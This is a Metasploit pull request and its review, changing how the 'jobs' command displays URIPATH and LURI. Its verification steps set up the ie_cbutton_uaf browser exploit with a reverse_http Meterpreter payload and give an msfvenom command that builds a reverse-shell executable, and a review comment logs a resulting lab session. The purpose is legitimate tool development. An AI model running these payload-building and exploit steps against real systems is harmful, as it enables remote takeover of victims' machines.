### PR TITLE
URIPATH vs LURI display in `jobs`

### PR DESCRIPTION
**Pull request by egypt**
Move `LURI` into a full URI in a new "Payload opts" column in `jobs` output, freeing up URIPATH to be what it has been historically.

See #4623 
## Verification
- [x] Start `msfconsole`
- [x] Set up a module that runs an http server
  - [x] `use exploit/windows/browser/ie_cbutton_uaf`
  - [x] `set PAYLOAD windows/meterpreter/reverse_http`
  - [x] `set URIPATH /cbutton`
  - [x] `set ReverseListenerBindAddress 0.0.0.0`
  - [x] `set LURI /nativewindows`
  - [x] `run`
- [x] `jobs`
- [x] **Verify** output contains a URI in the "Payload opts" column that matches your settings, e.g.: `http://192.168.99.1:8080/nativewindows`
- [x] `jobs -v`
- [x] **Verify** output contains a URI in the "Handler opts" column that matches your settings, e.g.: `http://0.0.0.0:8080/nativewindows`
- [x] **Verify** output contains a URI in the "URIPATH" column that matches your settings, e.g.: `/cbutton`
- [x] generate a meterpreter/reverse_http executable that matches your handler settings from above
  - [x] `./msfvenom -p windows/meterpreter/reverse_http LPORT=8080 LHOST=192.168.99.1 LURI=/nativewindows -f exe > met-8080_nativewindows.exe`
  - [x] run it on a windows box
- [x] **Verify** Still gets a working shell

### CODE REVIEW

**Comment by bcook-r7** [comment]
Processing...

**Comment by bcook-r7** [comment]
Bueno! Landing.

**Comment by bcook-r7** [comment]
```
[*] http://0.0.0.0:8080/nativewindows handling request from 192.168.56.102; (UUID: hrvtcour) Staging Native payload...
[*] Meterpreter session 1 opened (192.168.56.1:8080 -> 192.168.56.102:49197) at 2016-06-03 13:56:17 -0500
[*] Session ID 1 (192.168.56.1:8080 -> 192.168.56.102:49197) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: test3.exe (3796)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2032

msf exploit(ie_cbutton_uaf) >
msf exploit(ie_cbutton_uaf) > [+] Successfully migrated to process
sessions

Active sessions
===============

  Id  Type                   Information              Connection
  --  ----                   -----------              ----------
  1   meterpreter x86/win32  msf-dev\bcook @ MSF-DEV  192.168.56.1:8080 -> 192.168.56.102:49197 (192.168.56.102)

msf exploit(ie_cbutton_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > show op
[-] Unknown command: show.
meterpreter > sysinfo
Computer        : MSF-DEV
OS              : Windows 8.1 (Build 9600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.102 - Meterpreter session 1 closed.  Reason: User exit
```

File: lib/msf/base/serializer/readable_text.rb [hunk 1]
```diff
@@ -668,34 +659,41 @@ def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = Def
...
       # Job context is stored as an Array with the 0th element being
       # the running module. If that module is an exploit, ctx will also
       # contain its payload.
-      ctx = framework.jobs[k].ctx
-      row = [ k, framework.jobs[k].name ]
-      row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)
-
-      # Make the LPORT show the bind port if it's different
-      local_port = ctx[0].datastore['LPORT']
-      bind_port = ctx[0].datastore['ReverseListenerBindPort']
```
Comment (OJ) [inline lib/msf/base/serializer/readable_text.rb]: Doh! We lots the bind port output! NOOOOOO!!!

Comment (wvu-r7) [inline lib/msf/base/serializer/readable_text.rb]: Lots of bind ports!!

Comment (busterb) [inline lib/msf/base/serializer/readable_text.rb]: can you and @egypt work this out? playing tug-of-war with this functionality doesn't make sense.

Comment (OJ) [inline lib/msf/base/serializer/readable_text.rb]: I doubt this was intentional, so no "tug of war" is going on :) The main question here will be: how do we want it represented on-screen?

Comment (bcook-r7) [inline lib/msf/base/serializer/readable_text.rb]: Ok, looks like it should slot into row[3] if applicable?

**Pull request merged**